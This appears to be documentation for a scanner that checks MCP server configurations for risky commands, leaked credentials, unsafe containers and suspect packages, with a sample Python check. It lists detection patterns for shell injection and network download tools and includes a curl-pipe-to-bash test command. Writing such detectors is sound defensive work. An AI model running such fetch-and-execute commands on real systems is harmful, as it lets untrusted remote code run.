| Check ID | Name | Description |
|---|---|---|
| type.detection | Server Type | Classifies the server as package manager, container, binary, script, or HTTP based on command and transport. All other checks depend on its output. |
| universal.command_sanitization | Command Safety | Detects dangerous patterns in command and args: privilege escalation, shell injection, network downloads, dynamic code execution, and temp path usage. |
| universal.credential_detection | Credentials | Finds plaintext credentials in args, URLs, and environment variables — AWS keys, GitHub/Stripe/Anthropic/OpenAI tokens, JWTs, URL credentials, and sensitive env var names. |
| universal.registry.verification | Registry Listing | Checks whether the server is listed in the official MCP Registry. |
| universal.github.trust | GitHub Trust | Evaluates trust signals — archived status, last activity, license, stars, contributor count. Cross-validates repo URLs across sources. |
| script.location | Script Location | Flags scripts running from unsafe locations like /tmp or home directories. |
| script.permissions | Script Permissions | Detects world-writable scripts. |
| binary.location | Binary Location | Evaluates binary path safety — system paths, /opt, home dirs, temp dirs, and unknown locations. |
| binary.permissions | Binary Permissions | Detects world-writable or group-writable binaries. |
| container.isolation | Container Isolation | Flags --privileged mode, dangerous capabilities (SYS_ADMIN), host namespace sharing, missing --cap-drop, and writable filesystems. |
| container.volumes | Container Volumes | Flags dangerous volume mounts — root filesystem, /etc, Docker socket, SSH keys, cloud credentials, and kube config. |
| container.image | Container Image | Checks whether images use digest pinning (@sha256:) vs mutable tags. Looks for Sigstore attestations. |
| container.registry.existence | Container Registry | Verifies the container image exists in its OCI registry. Flags digest mismatches as possible tampering. |
| container.registry.signature | Container Signature | Checks whether the image has a cosign signature with keyless/Fulcio certificates. |
| package.vulnerability | Vulnerabilities | Queries OSV.dev for known CVEs and malware in npm/PyPI packages. Severity mapped from CVSS score. |
| package.typosquatting | Typosquatting | Detects similarly-named packages that could indicate a typosquatting attack. |
| package.distribution | Distribution | Evaluates package adoption — download counts and package age. |
| package.repository | Source Repository | Checks whether the package links to a source repository. Cross-checks npm, PyPI, deps.dev, and MCP Registry. |
| package.unscoped_variant | Unscoped Variant | For scoped npm packages (@scope/pkg): checks if the unscoped variant has known malware or vulnerabilities. |
| http.oauth | OAuth | For public HTTP/SSE servers: discovers OAuth/OIDC configuration. Flags missing authentication and HTTP-only endpoints. |
Check Applicability by Server Type
Not all checks apply to all server types. The scanner automatically skips checks that don't apply and marks them as `skip` in findings.
| Server Type | Applicable Checks |
|---|---|
| Package Manager (npx, bunx, uvx…) | Server Type, Command Safety, Credentials, Registry Listing, Vulnerabilities, Typosquatting, Distribution, Source Repository, Unscoped Variant, GitHub Trust |
| Container (docker, podman…) | Server Type, Command Safety, Credentials, Container Isolation, Container Volumes, Container Image, Container Registry, Container Signature, Registry Listing, GitHub Trust |
| Binary | Server Type, Command Safety, Credentials, Binary Location, Binary Permissions, Registry Listing, GitHub Trust |
| Script (python, node…) | Server Type, Command Safety, Credentials, Script Location, Script Permissions, Registry Listing, GitHub Trust |
| Public HTTP/SSE | Server Type, Credentials, Registry Listing, GitHub Trust, OAuth |
| Local HTTP/SSE | Server Type, Credentials |
Checklist IDs
Each finding includes a `checklist_id` in its metadata field. These IDs identify the exact sub-check that triggered the finding.
ST — Server Type
| ID | Severity | Description |
|---|---|---|
| ST-1.1 | skip | Package manager server detected |
| ST-1.2 | note | Container runtime (Docker, Podman) |
| ST-1.3 | note | Local binary |
| ST-1.4 | medium | Script-based server |
| ST-1.5 | medium | Unknown command — not recognized |
| ST-2.1 | medium | Local/private network server |
| ST-2.3 | note / high | Public server — note if HTTPS, high if unencrypted HTTP |
| ST-2.5 | high | Unreachable server — URL missing or invalid |
UC-1 — Command Safety
| ID | Severity | Description |
|---|---|---|
| UC-1.1 | critical | Sudo / administrator privileges requested |
| UC-1.2 | critical | Shell injection metacharacters (;, &&, \|\|, $(, backtick, ${) |
| UC-1.3 | high | Network download commands (curl, wget, netcat, fetch, aria2c, axel) |
| UC-1.4 | high | Shell execution (bash/sh/zsh -c) |
| UC-1.5 | high | Dynamic execution (--exec, -e, eval, exec()) |
| UC-1.6 | high | Temporary paths (/tmp/, /var/tmp/, /dev/shm/) |
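As an added illustration (not the scanner's own code), the following Python applies the six UC-1 sub-checks above to an MCP server's command and args and returns findings keyed by `checklist_id`. The token sets and regex are assumptions derived from the table's descriptions, and the sample server definitions are constructed.

```python
import re

# Added example, not the scanner's own implementation: UC-1.1 .. UC-1.6 applied
# to a server's command line, returning (checklist_id, severity) pairs.
SHELL_META = re.compile(r";|&&|\|\||\$\(|`|\$\{")          # UC-1.2 (assumed set)
DOWNLOADERS = {"curl", "wget", "nc", "netcat", "fetch", "aria2c", "axel"}
SHELLS = {"bash", "sh", "zsh"}
DYNAMIC_FLAGS = {"--exec", "-e", "eval"}
TEMP_PATHS = ("/tmp/", "/var/tmp/", "/dev/shm/")
SEVERITY_ORDER = ["note", "medium", "high", "critical"]


def _basename(word: str) -> str:
    return word.rsplit("/", 1)[-1]


def check_command(command: str, args: list[str]) -> list[tuple[str, str]]:
    """Apply UC-1.1 .. UC-1.6 to a command line; findings are in table order."""
    tokens = [command, *args]
    # Also split on whitespace so 'sh -c "curl ... | bash"' still exposes curl.
    words = [w for t in tokens for w in t.split()]
    findings = []
    if any(_basename(w) == "sudo" for w in words):
        findings.append(("UC-1.1", "critical"))
    if any(SHELL_META.search(t) for t in tokens):
        findings.append(("UC-1.2", "critical"))
    if any(_basename(w) in DOWNLOADERS for w in words):
        findings.append(("UC-1.3", "high"))
    if _basename(command) in SHELLS and "-c" in args:
        findings.append(("UC-1.4", "high"))
    if any(w in DYNAMIC_FLAGS or "exec(" in w for w in words):
        findings.append(("UC-1.5", "high"))
    if any(p in t for t in tokens for p in TEMP_PATHS):
        findings.append(("UC-1.6", "high"))
    return findings


def worst_severity(findings: list[tuple[str, str]]) -> str:
    """Highest severity among the findings, or 'note' when the command is clean."""
    return max((s for _, s in findings), key=SEVERITY_ORDER.index, default="note")


# Constructed sample server definitions (not taken from any real config).
SAMPLES = {
    "clean": ("npx", ["-y", "@example/mcp-server"]),
    "piped": ("sh", ["-c", "curl https://example.invalid/run.sh | bash"]),
    "chained": ("node", ["server.js && echo done"]),
    "tmp": ("/tmp/mcp-server", []),
}

if __name__ == "__main__":
    for name, (cmd, args) in SAMPLES.items():
        found = check_command(cmd, args)
        print(f"{name:8} {worst_severity(found):9} {[cid for cid, _ in found]}")
```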
UC-2 — MCP Registry Verification
| ID | Severity | Description |
|---|---|---|
| UC-2.1 | note | Listed in Official MCP Registry (active) |
| UC-2.2 | high | Removed from Official MCP Registry |
| UC-2.3 | medium | Not listed in Official MCP Registry |
UC-3 — GitHub Trust
| ID | Severity | Description |
|---|---|---|
| UC-3.1 | note / medium / high | Repository trust evaluation — note if well-established, medium for limited trust signals, high if archived |
| UC-3.2 | high | Repository URL mismatch across sources (possible supply chain attack) |
CD-1 — Credential Detection
| ID | Severity | Description |
|---|---|---|
| CD-1.1 | critical | Hardcoded credentials — AWS keys, GitHub/Stripe/Slack/Anthropic/OpenAI tokens, Google API keys |
| CD-1.2 | high | High-sensitivity tokens — GitLab PATs, JWTs |
| CD-1.3 | medium | Generic API key with common prefix (sk-, api_, key_, token_) or env var credential reference |
| CD-1.5 | critical | Credentials embedded in URL (://user:pass@host) |
SC-1 — Script Location
| ID | Severity | Description |
|---|---|---|
| SC-1.1 | critical | Script in temporary location (/tmp, /var/tmp, /dev/shm) |
| SC-1.2 | medium | Script in user home directory |
| SC-1.3 | note / high | Location OK (note), or could not determine path (high) |
SC-2 — Script Permissions
| ID | Severity | Description |
|---|---|---|
| SC-2.1 | critical / high / note | World-writable (critical), permissions unavailable (high), permissions OK (note) |
BN-1 — Binary Location
| ID | Severity | Description |
|---|---|---|
| BN-1.1 | note | Binary in protected system location (/usr/bin, /usr/local/bin) |
| BN-1.2 | medium | Binary in /opt directory |
| BN-1.3 | medium | Binary in user home directory |
| BN-1.4 | critical | Binary in temporary location (/tmp, /var/tmp, /dev/shm) |
| BN-1.5 | high | Non-absolute path or unknown location |
BN-2 — Binary Permissions
| ID | Severity | Description |
|---|---|---|
| BN-2.1 | critical / note | World-writable (critical), permissions OK (note) |
| BN-2.2 | high | Group-writable binary |
CT-1 — Container Isolation
| ID | Severity | Description |
|---|---|---|
| CT-1.1 | critical / note | Runs with --privileged (critical), isolation OK (note) |
| CT-1.2 | critical | Dangerous capabilities added (SYS_ADMIN, ALL, SYS_PTRACE, NET_ADMIN) |
| CT-1.3 | critical | Shares host namespaces (--pid=host, --network=host) |
| CT-1.4 | medium | No --cap-drop to restrict capabilities |
| CT-1.5 | medium | Writable filesystem (no --read-only) |
CT-2 — Container Volumes
| ID | Severity | Description |
|---|---|---|
| CT-2.1 | high / note | Root filesystem mounted (high), volume configuration OK (note) |
| CT-2.2 | high | Mounts /etc (system configuration) |
| CT-2.3 | high | Mounts Docker socket — container escape risk |
| CT-2.4 | high | Mounts sensitive credentials (~/.ssh, ~/.aws, ~/.kube) |
CT-3 — Container Image Pinning
| ID | Severity | Description |
|---|---|---|
| CT-3.1 | note | Image uses SHA256 digest pinning |
| CT-3.2 | medium | Image uses mutable tag (not digest-pinned) |
| CT-3.3 | medium | Image uses implicit :latest tag |
CT-4 — Sigstore Attestation
| ID | Severity | Description |
|---|---|---|
| CT-4.1 | note | Sigstore attestation verified |
| CT-4.2 | note | No Sigstore attestation found |
CT-5 — Container Registry
| ID | Severity | Description |
|---|---|---|
| CT-5.1 | note | Image verified in registry |
| CT-5.2 | critical | Image digest mismatch — possible tampering |
| CT-5.3 | high | Image not found in registry |
CT-6 — Container Signature
| ID | Severity | Description |
|---|---|---|
| CT-6.1 | note | Cosign signature detected |
| CT-6.2 | note | Keyless (Fulcio) signature with certificate |
| CT-6.3 | medium | No cosign signature found |
PH-3 — OAuth / HTTP Auth
| ID | Severity | Description |
|---|---|---|
| PH-3.1 | critical | Public server returns data without authentication |
| PH-3.2 | note | Non-OAuth authentication detected (401/403 without OAuth metadata) |
| PH-3.3 | note | Server implements OAuth/OpenID Connect |
| PH-3.4 | high | No OAuth discovery endpoints and auth status undetermined |
PM-1 — Package Vulnerabilities
| ID | Severity | Description |
|---|---|---|
| PM-1.1 | critical | Critical vulnerability (CVSS ≥ 9.0) |
| PM-1.2 | high | High vulnerability (CVSS 7.0–8.9) |
| PM-1.3 | medium | Moderate vulnerability (CVSS 4.0–6.9) |
| PM-1.4 | note | Low vulnerability (CVSS < 4.0) |
PM-2 — Package Malware
| ID | Severity | Description |
|---|---|---|
| PM-2.1 | critical | Known malware detected |
PM-3 — Source Repository
| ID | Severity | Description |
|---|---|---|
| PM-3.1 | critical | No source repository linked to package |
| PM-3.3 | note | Source repository verified |
PM-5 — Typosquatting
| ID | Severity | Description |
|---|---|---|
| PM-5.1 | high / note | Similar package names detected (high), none detected (note) |
PM-6 — Package Distribution
| ID | Severity | Description |
|---|---|---|
| PM-6.1 | high / medium / note | Very low downloads (high), low downloads or young package (medium), adoption OK (note) |
PM-8 — Unscoped Variant
| ID | Severity | Description |
|---|---|---|
| PM-8.1 | high / medium | Malware in unscoped variant (high), vulnerabilities in unscoped variant (medium) |